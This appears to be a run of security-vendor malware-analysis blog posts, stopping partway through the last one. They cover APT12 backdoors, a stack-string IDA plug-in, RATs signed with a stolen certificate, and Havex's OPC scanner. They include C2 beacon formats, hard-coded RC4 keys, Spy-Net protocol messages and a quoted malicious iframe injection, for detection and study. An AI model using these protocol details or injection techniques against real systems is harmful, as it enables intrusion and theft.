MD5 6e59861931fa2796ee107dc27bfdd480
Size 75264 bytes
Compile Time 2014-08-23 08:22:49
Import Hash ead55ef2b18a80c00786c25211981570


The HIGHTIDE backdoor connected directly to its command-and-control server. If you compare the HTTP GET request from the RIPTIDE samples (Figure 1) to the HTTP GET request from the HIGHTIDE samples (Figure 3), you can see the malware author changed the following items:

  • User Agent
  • Format and structure of the HTTP Uniform Resource Identifier (URI)


Figure 3: HIGHTIDE GET Request Example

Similar to RIPTIDE campaigns, APT12 infects target systems with HIGHTIDE using a Microsoft Word (.doc) document that exploits CVE-2012-0158. FireEye observed APT12 deliver these exploit documents via phishing emails in multiple cases. Based on past APT12 activity, we expect the threat group to continue to utilize phishing as a malware delivery method.

MD5 File Name Exploit
73f493f6a2b0da23a79b50765c164e88 議程最新修正及注意事項.doc CVE-2012-0158
f6fafb7c30b1114befc93f39d0698560 0824.1.doc CVE-2012-0158
eaa6e03d9dae356481215e3a9d2914dc 簡易名冊0全國各警察機關主官至分局長.doc CVE-2012-0158
06da4eb2ab6412c0dc7f295920eb61c4 附檔.doc CVE-2012-0158
53baedf3765e27fb465057c48387c9b6 103年第3屆通訊錄.doc CVE-2012-0158
00a95fb30be2d6271c491545f6c6a707 2014 09 17 Welcome Reception for Bob and Jason_invitation.doc CVE-2012-0158
4ab6bf7e6796bb930be2dd0141128d06 產諮會_Y103(2)委員會_從東協新興國家崛起(0825).doc CVE-2012-0158


Figure 4: Identified exploit documents for HIGHTIDE 

When the file is opened, it drops HIGHTIDE in the form of an executable file onto the infected system.

RIPTIDE and HIGHTIDE differ on several points: executable file location, image base address, the User-Agent within the GET requests, and the format of the URI. The RIPTIDE exploit document drops its executable file into the C:\Documents and Settings\{user}\Application Data\Location folder while the HIGHTIDE exploit document drops its executable file into the C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\ folder. All but one sample that we identified were written to this folder as word.exe. The one outlier was written as winword.exe.

Research into this HIGHTIDE campaign revealed APT12 targeted multiple Taiwanese Government organizations between August 22 and 28.

THREEBYTE Malware Family

On Monday, August 25, 2014, we observed a different spear-phishing email sent to a technology company located in Taiwan. This spear phish contained a malicious Word document that exploited CVE-2012-0158. The MD5 of the exploit document was e009b95ff7b69cbbebc538b2c5728b11.

Similar to the newly discovered HIGHTIDE samples documented above, this malicious document dropped a backdoor to C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe. This backdoor had the following properties:

MD5 16e627dbe730488b1c3d448bfc9096e2
Size 75776 bytes
Compile Time 2014-08-25 01:22:20
Import Hash dcfaa2650d29ec1bd88e262d11d3236f


This backdoor sent the following callback traffic to video[.]csmcpr[.]com:


Figure 5:  THREEBYTE GET Request Beacon

The THREEBYTE spear phishing incident (while not yet attributed) shared the following characteristics with the above HIGHTIDE campaign attributed to APT12:

  • The THREEBYTE backdoor was compiled two days after the HIGHTIDE backdoors.
  • Both the THREEBYTE and HIGHTIDE backdoors were used in attacks targeting organizations in Taiwan.
  • Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe.
  • APT12 has previously used the THREEBYTE backdoor.

WATERSPOUT Malware Family

On August 25, 2014, we observed another round of spear phishing emails targeting a high-technology company in Japan. Attached to this email was another malicious document that was designed to exploit CVE-2012-0158. This malicious Word document had an MD5 of 499bec15ac83f2c8998f03917b63652e and dropped a backdoor to C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe. The backdoor had the following properties:

MD5 f9cfda6062a8ac9e332186a7ec0e706a
Size 49152 bytes
Compile Time 2014-08-25 02:10:11
Import Hash 864cd776c24a3c653fd89899ca32fe0b


The backdoor connects to a command and control server at icc[.]ignorelist[.]com.

Similar to RIPTIDE and HIGHTIDE, the WATERSPOUT backdoor is an HTTP-based backdoor that communicates with its C2 server.

GET /<string>/<5 digit number>/<4 character string>.php?<first 3 characters of last string>_id=<43 character string>= HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: <C2 Location>
Cache-Control: no-cache


Figure 6: Sample GET request for WATERSPOUT backdoor
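The URI structure in Figure 6 is regular enough to sketch a simple pattern match against proxy logs. The regex below is only an approximation of the format described above (it assumes an alphanumeric path token and a base64-like 43-character ID), not a production detection signature:

```python
import re

# Approximate pattern for the beacon URI in Figure 6:
# /<string>/<5 digit number>/<4 char string>.php?<3 chars>_id=<43 chars>=
WATERSPOUT_URI = re.compile(
    r"^/[^/]+/\d{5}/[A-Za-z0-9]{4}\.php"
    r"\?[A-Za-z0-9]{3}_id=[A-Za-z0-9+/]{43}=$"
)

def looks_like_waterspout(uri: str) -> bool:
    """Return True if a request URI matches the sketched beacon shape."""
    return WATERSPOUT_URI.match(uri) is not None
```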

Although there are no current infrastructure ties to link this backdoor to APT12, there are several data points that show a possible tie to the same actors:

  • The same initial delivery method (a spear-phishing email) with a Microsoft Word document exploiting CVE-2012-0158.
  • The same “Tran Duy Linh” Microsoft Word exploit kit was used to deliver this backdoor.
  • Similar targets were observed where the threat actors utilized this backdoor:
    • A Japanese technology company
    • Taiwanese government organizations
    • Organizations in the Asia-Pacific region that are of interest to China
  • The WATERSPOUT backdoor was written to the same file paths as the HIGHTIDE backdoors:
    • C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\word.exe
    • C:\DOCUMENTS and SETTINGS\{user}\LOCAL SETTINGS\Temp\winword.exe
  • WATERSPOUT was compiled within two days of the last HIGHTIDE backdoor and on the same day as the THREEBYTE backdoor.

Although these points do not definitively tie WATERSPOUT to APT12, they do indicate a possible connection between the WATERSPOUT campaign, the THREEBYTE campaign, and the HIGHTIDE campaign attributed to APT12.

FireEye believes the change from RIPTIDE to HIGHTIDE represents a temporary tool shift to decrease malware detection while APT12 developed a completely new malware toolset. These development efforts may have resulted in the emergence of the WATERSPOUT backdoor.


Figure 7: Compile dates for all three malware families

APT12’s adaptations to public disclosures lead FireEye to several conclusions about this threat group:

  • APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed.
  • APT12 has the ability to adapt quickly to public exposures with new tools, tactics, and procedures (TTPs).
  • Public disclosures may result in an immediate change in APT12’s tools. These changes may be temporary; FireEye believes they are aimed at decreasing detection until a more permanent and effective TTP change can be implemented (e.g., WATERSPOUT).

Though public disclosures resulted in APT12 adaptations, FireEye observed only a brief pause in APT12 activity before the threat actors returned to normal activity levels. Similarly, the public disclosure of APT12’s intrusion at the New York Times led to only a brief pause in the threat group’s activity and immediate changes in TTPs. The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report. Currently, APT12 continues to target organizations and conduct cyber operations using its new tools. Most recently, FireEye observed HIGHTIDE at multiple Taiwan-based organizations and the suspected APT12 WATERSPOUT backdoor at a Japan-based electronics company. We expect APT12 to continue this trend, evolving and changing its tactics to stay ahead of network defenders.

Note: IOCs for this campaign can be found here.

FLARE IDA Pro Script Series: Automatic Recovery of Constructed Strings in Malware

The FireEye Labs Advanced Reverse Engineering (FLARE) Team is dedicated to sharing knowledge and tools with the community. We started with the release of the FLARE On Challenge in early July where thousands of reverse engineers and security enthusiasts participated. Stay tuned for a write-up of the challenge solutions in an upcoming blog post.

This post is the start of a series where we look to aid other malware analysts in the field. Since IDA Pro is the most popular tool used by malware analysts, we’ll focus on releasing scripts and plug-ins to help make it an even more effective tool for fighting evil. In the past, at Mandiant, we released scripts on GitHub, and we’ll continue to do so at our new repository. That is also where you will find the plug-ins we released in the past: Shellcode Hashes and Struct Typer. We hope you find all these scripts as useful as we do.

Quick Challenge

Let’s start with a simple challenge. What two strings are printed when executing the disassembly shown in Figure 1?


Figure 1: Disassembly challenge

If you answered “Hello world\n” and “Hello there\n”, good job! If you didn’t see it then Figure 2 makes this more obvious. The bytes that make up the strings have been converted to characters and the local variables are converted to arrays to show buffer offsets.

Figure 2: Disassembly challenge with markup

Reverse engineers are likely more accustomed to strings that are a consecutive sequence of human-readable characters in the file, as shown in Figure 3. IDA generally does a good job of cross-referencing these strings in code as can be seen in Figure 4.

Figure 3: A simple string

Figure 4: Using a simple string

Manually constructed strings like in Figure 1 are often seen in malware. The bytes that make up the strings are stored within the actual instructions rather than a traditional consecutive sequence of bytes. Simple static analysis with tools such as strings cannot detect these strings. The code in Figure 5, used to create the challenge disassembly, shows how easy it is for a malware author to use this technique.

Figure 5: Challenge source code

Automating the recovery of these strings during malware analysis is simple if the compiler follows a basic pattern. A quick examination of the disassembly in Figure 1 could lead you to write a script that searches for mov instructions beginning with the opcodes C6 45 and then extracts the stack offset and character bytes. Modern compilers with optimizations enabled often complicate matters as they may:

  • Load frequently used characters in registers which are used to copy bytes into the buffer
  • Reuse a buffer for multiple strings
  • Construct the string out of order
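The naive opcode scan described above can be sketched in a few lines. This toy example only handles the unoptimized C6 45 pattern (mov byte ptr [ebp+disp8], imm8), treats the displacement as an unsigned byte for simplicity, and ignores all of the optimized-code cases just listed:

```python
def recover_stack_strings(code: bytes) -> str:
    """Scan raw x86 bytes for C6 45 <disp8> <imm8> instructions and
    rebuild the string by ordering immediates by stack offset."""
    chars = {}
    i = 0
    while i + 3 < len(code):
        if code[i] == 0xC6 and code[i + 1] == 0x45:
            disp, imm = code[i + 2], code[i + 3]
            if imm != 0:           # skip the null terminator writes
                chars[disp] = chr(imm)
            i += 4                 # instruction is 4 bytes long
        else:
            i += 1
    return "".join(chars[off] for off in sorted(chars))
```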

Figure 6 shows the disassembly of the same source code that was compiled with optimizations enabled. This caused the compiler to load some of the frequently occurring characters in registers to reduce the size of the resulting assembly. Extra instructions are required to load the registers with a value like the 2-byte mov instruction at 0040115A, but using these registers requires only a 4-byte mov instruction like at 0040117D. The mov instructions that contain hard-coded byte values are 5-bytes, such as at 0040118F.

Figure 6: Compiler optimizations

The StackStrings IDA Pro Plug-in

To help you defeat malware that contains these manually constructed strings, we’re releasing an IDA Pro plug-in named StackStrings. The plug-in relies heavily on analysis by a Python library called Vivisect, a binary analysis framework we frequently use to augment our analysis. StackStrings uses Vivisect’s analysis and emulation capabilities to track simple memory usage by the malware. The plug-in identifies memory writes of likely string data to consecutive memory addresses, prints the strings and their locations, and creates comments where each string is constructed. Figure 7 shows the result of running the above program with the plug-in.

Figure 7: StackStrings plug-in results

While the plug-in is called StackStrings, its analysis is not limited to the stack. It also tracks all memory segments accessed during Vivisect’s analysis, so manually constructed strings in global data are identified as well, as shown in Figure 8.

Figure 8: Sample global string

Simple, manually constructed WCHAR strings are also identified by the plug-in as shown in Figure 9.

Figure 9: Sample WCHAR data


Download Vivisect and add the package to your PYTHONPATH environment variable if you don’t already have it installed.

Clone the git repository. The script in the python\ directory is the IDA Python script that contains the plug-in logic; it can either be copied to your %IDADIR%\python directory or placed in any directory found in your PYTHONPATH. The file in the plugins\ directory must be copied to the %IDADIR%\plugins directory.

Test the installation by running the following Python commands within IDA Pro and ensure no error messages are produced:

Figure: Python commands used to verify the installation

To run the plug-in in IDA Pro, go to Edit – Plugins – StackStrings or press Alt+0.

Known Limitations

The compiler may aggressively optimize memory and register usage when constructing strings. The worst-case scenario for recovering these strings occurs when a memory buffer is reused multiple times within a function and string construction spans multiple basic blocks. Figure 10 shows the construction of “Hello world\n” and “Hello there\n”. The plug-in attempts to deal with this by asking whether you want to use the basic-block aggregator or the function aggregator. Often the basic-block level of memory aggregation is sufficient, but in this situation running the plug-in both ways provides additional results.

Figure 10: Two strings, one buffer, multiple basic blocks

You’ll likely get some false positives due to how Vivisect initializes some data for its emulation. False positives should be obvious when reviewing results, as seen in Figure 11.

Figure 11: False positive due to memory initialization

The plug-in aggressively checks for strings during aggregation steps, so you’ll likely get some false positives if the compiler sets null bytes in a stack buffer before the complete string is constructed.

The plug-in currently loads a separate Vivisect workspace for the same executable loaded in IDA. If you’ve manually loaded additional memory segments within your IDB file, Vivisect won’t be aware of that and won’t process those.

Vivisect’s analysis does not always exactly match that of IDA Pro, and differences in the way the stack pointer is tracked between the two programs may affect the reconstruction of stack strings.

If the malware is storing a binary string that is later decoded, even with a simple XOR mask, this plug-in likely won’t work.

The plug-in was originally written to analyze 32-bit x86 samples. It has worked on test 64-bit samples, but it hasn’t been extensively tested for that architecture.


StackStrings is just one of many internally developed tools we use on the FLARE team to speed up our analysis. We hope it will help speed up your analysis too. Stay tuned for our next post where we’ll release another tool to improve your malware analysis workflow.

The Little Signature That Could: The Curious Case of CZ Solution

Malware authors are always looking for new ways to disguise their actions. Attackers want their malware to be not only fully undetectable, but also to appear valid on a system, so as not to draw attention. Digital signatures are one way malware authors stay under the radar, since a signature offers a quick, easy way to verify the authenticity of an application.

Threat actors routinely steal digital signing certificates to hide in plain sight. There are recent reports of banking Trojans, such as Zeus, using valid signatures to get past both automated and human defenses. Part of performing accurate threat intelligence is continually looking to the past to help better predict the future. This is demonstrated by the samples we will be discussing in this blog, many of which date from the summer of 2013. These particular samples piqued our interest because of the mass distribution of RATs in a particular targeted region, and they reminded us of an XtremeRAT blog we published earlier in 2014.

The Little Signature That Could

While investigating an uptick in Spy-Net spam campaigns, we came across a digitally signed malware binary that struck our interest. Spy-Net allows an attacker to interact with the victim via a remote shell to upload/download files, interact with the registry, manipulate running processes and services, capture images of the desktop, and record from the webcam and microphone. It also contains functionality to extract saved passwords and turn the victim into a proxy server. During the build process, an attacker can choose to enable a keylogger and evasion functionality designed to stop the infection process if a debugger or virtual machine is found.

We noticed that one of the Spy-Net binary files, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0), upon closer inspection, was utilizing a valid digital signature, from a company called CZ Solution Co. Ltd.


Figure 1: Signature Details of sc2.exe

Looking closer at the signature, we noticed that all of the details were intact, and appeared to be valid. There are two additional code-signing certificates issued to CZ Solution Co. Ltd.


Figure 2: Additional Signature Details

Investigation of sc2.exe showed typical Spy-Net behaviors, and the sample beaconed out to its C2 server. From here, we decided to pivot off the CZ Solution signature and see what we could find.

Connections Emerge

As we pivoted off the CZ Solution signature, we began to see some interesting commonalities. Pivoting proved that the CZ Solution signature was not used only in Spy-Net binaries: we quickly found it was also being used with XtremeRAT, a popular RAT that cybercriminals and targeted attackers use regularly. The code of XtremeRAT is shared amongst several other Delphi RAT projects, including Spy-Net, CyberGate, and Cerberus.

XtremeRAT allows an attacker to:

  • Interact with the victim via a remote shell
  • Upload/download files
  • Interact with the registry
  • Manipulate running processes and services
  • Capture images of the desktop
  • Record from connected devices, such as a webcam or microphone

One binary, for instance, m.exe (MD5: c27232691dacf4cff24a4d04b3b2896b), which was XtremeRAT, was seen beaconing out to http://omegaphotography.[co].uk with the URI paths /1234567890.functions and /[plugin].xtr.

Likewise, we saw multiple samples of the Zeus Trojan utilizing the CZ Solution signature. Operators can tune Zeus to steal the information they are interested in: typically login credentials for online social networks, e-mail accounts, online banking, or other online financial services. Zeus is commonly seen targeting customers of financial institutions.

One of the Zeus samples utilizing the CZ Solution signature, uk.exe (MD5: dcd3e45d40c8817061f716557e7a05b6), was beaconing out to its own C2.

Looking at the three samples shows that the CZ Solution certificate was used to sign Spy-Net, XtremeRAT, and Zeus samples. Graphing out the connections between the samples we profiled, you can quickly see how fast this web of similarities grows.

Figure 3: Connection Profile of Binaries Using CZ Solution

The French Connection and C2 overlap

Attribution of actors and/or campaigns can often be a difficult and tedious task. However, since we were dealing with so many intertwined binaries, we could start to draw some parallels between samples.

When looking at the overall connections involving the CZ Solution signature, a trend starts to emerge. First, there is some C2 overlap. For instance, Dllsv.exe (MD5: 3f042fd6b9ce7e23b3c84c6f7323dd75) communicates out to its C2 using the same CZ Solution cert. This malware is flagged as BozokRAT, a user-friendly RAT that can upload and download files to and from a computer, modify registry entries, and perform other typical RAT functions. That same C2 is also used by the aforementioned Spy-Net binary, sc2.exe (MD5: 6a56f6735f4b16a60f39b18842fd97d0).

In another example of C2 overlap, a file named uk.exe (MD5: 9c11ef09131a3373eef5c9d83802d56b), an active Zeus binary, shares its C2 with a file named x.exe (MD5: c27232691dacf4cff24a4d04b3b2896b), an active XtremeRAT binary.

Next, we needed to identify at least one infection vector to ensure we could track how one of the binaries using the CZ Solution signature was getting into environments.

In one case, we found the infection vector for an XtremeRAT binary that was using the CZ Solution certificate. The binary arrived in a phishing email (MD5: 7c00ba0fcbfee6186994a8988a864385) purportedly from Armani regarding an order.


The email was in French and the headers were interesting, as the same sender has been seen in multiple French spam runs.


The attachment in the email uses the RTLO trick to disguise a 7zip file as a PDF.
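As an illustration of how the RTLO trick works (the filename below is hypothetical, not the actual attachment name), the Unicode character U+202E RIGHT-TO-LEFT OVERRIDE makes everything after it render reversed:

```python
# Hypothetical filename: on disk this is a .7z archive, but the embedded
# U+202E override makes the tail render reversed, so it appears to end in ".pdf".
actual_name = "Commande_Armani\u202Efdp.7z"

# The real extension is .7z:
assert actual_name.endswith(".7z")

# What a naive rendering shows: the text after U+202E appears reversed.
head, _, tail = actual_name.partition("\u202e")
displayed = head + tail[::-1]
print(displayed)  # "Commande_Armaniz7.pdf" -- looks like a PDF to the victim
```

This is why security tools often flag or strip U+202E in filenames outright.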

Looking at all the samples we correlated and pivoted off of, we found that a majority of both the language and the C2s revolved around French. The domains that were part of the C2 infrastructure were almost exclusively French, as was the registrant information for the domains in question.

Spy-Net C2 Protocol Analysis

As we have already shared some analysis details of XtremeRAT in a previous blog, we decided to share some information and tools we built regarding Spy-Net this time. This information is based on our analysis of Spy-Net version 2.6 specifically. Other versions of Spy-Net may have significant changes to the protocol. Spy-Net 2.6 utilizes a homegrown protocol like many other publicly available RATs. It’s an ASCII-based, pipe-delimited protocol utilizing Portuguese keywords that employs two totally different forms of obfuscation: one for outbound communication to the attacker and another for inbound communication to the implant. The outbound communications are compressed with zlib and encrypted with RC4. The RC4 key is hard-coded and is updated with version changes. For example, the RC4 key for Spy-Net 2.6 is njkvenknvjebcddlaknvfdvjkfdskv, while for CyberGate 1.07, which has a similar (if not the same) protocol, the key is njgnjvejvorenwtrnionrionvironvrnvcg107, and CyberGate 1.18’s key is njgnjvejvorenwtrnionrionvironvrnvcg117.

The astute reader may have noticed that the last three numbers of the CyberGate keys (roughly) represent the version number of CyberGate. The inbound communication to the implant employs an ASCII encoding scheme similar to Base64.  This protocol begins with a simple authentication scheme where the implant sends an authentication password that is validated by the client. This password is configurable by the attacker and defaults to abcd1234.  The implant then proceeds to send the entirety of its configuration information, as configured by the attacker, to the client so it can be displayed on its “Configuration” tab.


Implant->Client: mypassword|Y|

Configuration Request and Response

Client->Implant: configuracoesdoserver|

Implant->Client: configuracoesdoserver|configuracoesdoserver||#myID|mypassword|C:\WINDOWS\install\server.exe|C:\Program Files\Internet Explorer\iexplore.exe| | |{0OP8GNN1-GIWW-CC7M-AJ0I-6Y554UOJJ241}|Policies|FALSE|TRUE|TRUE|TRUE|***MUTEX***| | |TRUE|FALSE| | | | | | |FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|FALSE|server.exe#crack.exe#|FALSE|

The outbound communications from the implant to the client are prepended with an ASCII representation of the length of the payload followed by a pipe character and a new line character.


There is a noticeable lack of sophistication in Spy-Net’s code. For example, in some cases the length indicator is followed by a pipe and a single newline (\n) character, as seen on *nix-based operating systems; in other cases it is followed by carriage return and newline characters (\r\n), as on Windows. This lack of conformity is also evident in the use of two totally different obfuscation schemes, and in the fact that obfuscation is not applied to file transfers as it is throughout the rest of the protocol.
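Putting the protocol details above together (an ASCII length prefix, a pipe, either \n or \r\n, then a zlib-compressed, RC4-encrypted payload), a minimal decoder for outbound implant traffic might look like this sketch. The framing handling is our interpretation; the RC4 key is the hard-coded Spy-Net 2.6 key mentioned above:

```python
import zlib

SPYNET_26_KEY = b"njkvenknvjebcddlaknvfdvjkfdskv"  # hard-coded RC4 key, Spy-Net 2.6

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def decode_outbound(message: bytes, key: bytes = SPYNET_26_KEY) -> bytes:
    """Strip the ASCII 'length|' prefix and newline, RC4-decrypt, zlib-inflate."""
    header, _, body = message.partition(b"|")
    # Tolerate both framings observed in the wild: "|\n" and "|\r\n".
    if body.startswith(b"\r\n"):
        body = body[2:]
    elif body.startswith(b"\n"):
        body = body[1:]
    payload = body[: int(header.decode("ascii"))]
    return zlib.decompress(rc4(key, payload))
```

Since RC4 is symmetric, the same `rc4` function also re-encodes traffic, which is convenient for building test captures.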

Spy-Net Protocol Decoder

Since Spy-Net is a publicly available RAT that we see in use quite often, we decided to build a ChopShop module for it and share it in cooperation with our friends at MITRE. The module is now available as a standard part of the framework available on GitHub. We are also sharing a Spy-Net configuration dumping pycommand for Immunity Debugger. While hunting for related samples in VirusTotal, we came across a pcap that had captured the initial infection and subsequent communication of the Spy-Net binary we initially mentioned (MD5: 6a56f6735f4b16a60f39b18842fd97d0). This gave us a great opportunity to test our new decoder. One thing that Spy-Net implants commonly send out automatically is a thumbnail image of the user’s desktop, which is displayed on the client.


Our decoder can extract such images from the pcap, and what we found gave us a further hint that we may be dealing with attacks focused in France. Although difficult to read due to the very low resolution of the thumbnail, our pcap decoder was able to tell us that the title of the browser window currently open in this screenshot is “Football - MAXIFOOT l'actualité foot et transfert - Windows Internet Explorer.”


Distribution via Malicious Java Applet

According to the details of the pcap we decoded, this French football Web site was apparently compromised and had an iframe inserted into it that pointed to another compromised Web site, a Canadian addiction recovery resource:

<iframe width="1px" height="1px" src="hxxp://" style="display: block;" ></iframe>

The latter site hosted a malicious Java applet that downloaded the Pony/Fareit malicious downloader. The downloader then proceeded to install ZeuS and download and execute the aforementioned Spy-Net binary. All of these binaries were signed with the stolen digital certificate. The malicious Java applet used to install the Pony downloader was created by Foxxy Software and had been previously written about by ESET.

RAT Configuration Details

We assembled a compilation of the meaningful configuration data found in the XtremeRAT and Spy-Net samples we came across in our analyses. You can observe some similarities between the samples’ configurations.

[Table: per-sample configuration data for two Spy-Net 2.6 samples and seven XtremeRAT 3.5 Private samples]


The usage of digital signatures isn’t going to decrease anytime soon, especially among threat actors. It gives them a quick, easy way to bypass traditional security controls, since certificates and signatures are typically trusted by default. The samples in this blog show that this trend still holds true. We looked toward the past in this blog to better understand motivations and trends going forward. Based on the information gathered, we can accurately say that the CZ Solution signatures were being utilized by an individual or group of individuals using French assets and infrastructure.

These particular actors didn’t show a significant level of expertise, but did show collective resources with knowledge of at least Zeus, Spy-Net, and XtremeRAT. We can accurately say it is likely these actors were using the same signature on a wide range of binaries, possibly even beyond the four families discussed here. As we wrote this blog, we couldn’t help but be reminded of the spam run focused on Colombia and Central America that we wrote about back in February of this year: a spam run that is regionally focused, but with no apparent targeting, utilizing a mix of ZeuS and off-the-shelf RATs.

Helping protect your organization from threats using valid digital signatures can include verifying the signature’s serial number. In this case, the serial number 6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52 8d 9e 65 10 is the identifier to locate for this publisher. Also, if you’re running your own internal certificate authority, ensure you are promptly revoking certificates that may have been compromised. This will help ensure compromised certificates are not utilized in attacks.
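As a minimal sketch of the serial-number check (helper names are ours; the serial is the CZ Solution one from this post), serials can be normalized to integers and matched against a blocklist regardless of spacing or case:

```python
CZ_SOLUTION_SERIAL = "6e 7b 63 95 ac 5b 5c 8a 2a ec c4 52 8d 9e 65 10"

def normalize_serial(serial: str) -> int:
    """Accept '6e 7b ...', '6E:7B:...', or bare hex and return an integer."""
    return int(serial.replace(" ", "").replace(":", ""), 16)

# Serials of certificates known to sign malware (from this investigation).
BLOCKLIST = {normalize_serial(CZ_SOLUTION_SERIAL)}

def is_blocked(serial) -> bool:
    """serial may be an int (e.g. from a parsed certificate) or a hex string."""
    if isinstance(serial, str):
        serial = normalize_serial(serial)
    return serial in BLOCKLIST
```

Comparing as integers avoids false mismatches caused purely by formatting differences between tools.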


Havex, It’s Down With OPC

FireEye recently analyzed the capabilities of a variant of Havex (referred to by FireEye as “Fertger” or “PEACEPIPE”), the first publicized malware reported to actively scan OPC servers used for controlling SCADA (Supervisory Control and Data Acquisition) devices in critical infrastructure (e.g., water and electric utilities), energy, and manufacturing sectors.

While Havex itself is a somewhat simple PHP Remote Access Trojan (RAT) that has been analyzed by other sources, none of these have covered the scanning functionality that could impact SCADA devices and other industrial control systems (ICS). Specifically, this Havex variant targets servers involved in OPC (Object linking and embedding for Process Control) communication, a client/server technology widely used in process control systems (for example, to control water pumps, turbines, tanks, etc.).

Note: ICS is a general term that encompasses SCADA (Supervisory Control and Data Acquisition) systems, DCS (Distributed Control Systems), and other control system environments. The term SCADA is well-known to wider audiences, and throughout this article, ICS and SCADA will be used interchangeably.

Threat actors have leveraged Havex in attacks across the energy sector for over a year, but the full extent of industries and ICS systems affected by Havex is unknown. We decided to examine the OPC scanning component of Havex more closely, to better understand what happens when it’s executed and the possible implications.

OPC Testing Environment

To conduct a true test of the Havex variant’s functionality, we constructed an OPC server test environment that fully replicates a typical OPC server setup (Figure 1 [3]). As shown, ICS or SCADA systems involve OPC client software that interacts directly with an OPC server, which works in tandem with the PLC (Programmable Logic Controller) to control industrial hardware (such as a water pump, turbine, or tank). FireEye replicated both the hardware and software of the OPC server setup (the components that appear within the dashed line on the right side of Figure 1).




Figure 1: Topology of typical OPC server setup

The components of our test environment are robust and comprehensive to the point that our system could be deployed in an environment to control actual SCADA devices. We utilized an Arduino Uno [1] as the primary hardware platform, acting as the OPC server. The Arduino Uno is an ideal platform for developing an ICS test environment because of its low power requirements, the large number of libraries that make programming the microcontroller easier, its serial communication over USB, and its low cost. We leveraged the OPC server and libraries from St4makers [2] (as shown in Figure 2). This software is available for free to SCADA engineers to allow them to develop software to communicate information to and from SCADA devices.


Figure 2: OPC Server Setup

Using the OPC Server libraries allowed us to make the Arduino Uno act as a true, functioning OPC SCADA device (Figure 3).


Figure 3: Matrikon OPC Explorer showing Arduino OPC Server

We also used Matrikon’s OPC Explorer [1], which enables browsing between the Arduino OPC server and the Matrikon embedded simulation OPC server. In addition, the Explorer can be used to add certain data points to the SCADA device – in this case, the Arduino device.


Figure 4: Tags identified for OPC server

In the OPC testing environment, we created tags in order to simulate a functioning OPC server. Tags, in relation to ICS devices, are single data points: for example, temperature, vibration, or fill level. A tag represents a single value monitored or controlled by the system at a single point in time.

With our test environment complete, we executed the malicious Havex DLL and analyzed how Havex’s OPC scanning module might affect OPC servers it comes in contact with.


The particular Havex sample we looked at was a file named PE.dll (MD5: 6bfc42f7cb1364ef0bfd749776ac6d38). Its scanning functionality directly scans for OPC servers, both on the host the sample runs on and laterally, across the entire network.

The scanning process starts when the Havex downloader calls the runDll export function.  The OPC scanner module identifies potential OPC servers by using the Windows networking (WNet) functions.  Through recursive calls to WNetOpenEnum and WNetEnumResources, the scanner builds a list of all servers that are globally accessible through Windows networking.  The list of servers is then checked to determine if any of them host an interface to the Component Object Model (COM) objects listed below:







Figure 5: Relevant COM objects
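The recursive WNetOpenEnum/WNetEnumResources walk described above can be mirrored in miniature. The sketch below substitutes a plain dictionary tree for the Windows networking API (the tree shape and names are ours), so only the traversal logic is illustrative:

```python
def collect_servers(resource: dict) -> list:
    """Depth-first walk of a network-resource tree; a stand-in for the
    recursive WNetOpenEnum/WNetEnumResources enumeration the scanner uses."""
    servers = []
    stack = [resource]
    while stack:
        node = stack.pop()
        if node.get("type") == "server":
            servers.append(node["name"])
        # Containers (networks, domains) are expanded recursively.
        stack.extend(node.get("children", []))
    return servers

# Hypothetical view of what the Windows networking enumeration might return:
network = {
    "type": "network",
    "children": [
        {"type": "domain", "children": [
            {"type": "server", "name": r"\\OPCSRV01"},
            {"type": "server", "name": r"\\FILESRV02"},
        ]},
        {"type": "server", "name": r"\\HMI-STATION"},
    ],
}
```

The real scanner then probes each discovered server for the COM interfaces in Figure 5.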

Once OPC servers are identified, the following CLSIDs are used to determine the capabilities of the OPC server:

Figure 6: CLSIDs used to determine capabilities of the OPC server

When executing PE.dll, all of the OPC server data output is first saved as %TEMP%\[random].tmp.dat. The results of a capability scan of an OPC server are stored in %TEMP%\OPCServer[random].txt. These files are not encrypted or deleted once the scanning process is complete.

Once the scanning completes, the log is deleted and the contents are encrypted and stored into a file named %TEMP%\[random].tmp.yls.  The encryption process uses an RSA public key obtained from the PE resource TYU.  The RSA key is used to protect a randomly generated 168-bit 3DES key that is used to encrypt the contents of the log.

The TYU resource is BZip2 compressed and XORed with the string “1312312”.  A decoded configuration for 6BFC42F7CB1364EF0BFD749776AC6D38 is included in the figure below:

Screen Shot 2014-07-17 at 12.27.24 PM

Figure 7: Sample decoded TYU resource

The 4409de445240923e05c5fa6fb4204 value is believed to be an RSA key identifier. The AASp1… value is the Base64 encoded RSA key.
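The TYU decoding described above can be sketched as follows. We assume the XOR layer is the outer one, i.e., the decoder removes the XOR with “1312312” first and then BZip2-decompresses the result:

```python
import bz2

TYU_XOR_KEY = b"1312312"  # repeating XOR key from the sample

def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decode_tyu(resource: bytes) -> bytes:
    """Undo the XOR layer, then BZip2-decompress the embedded configuration."""
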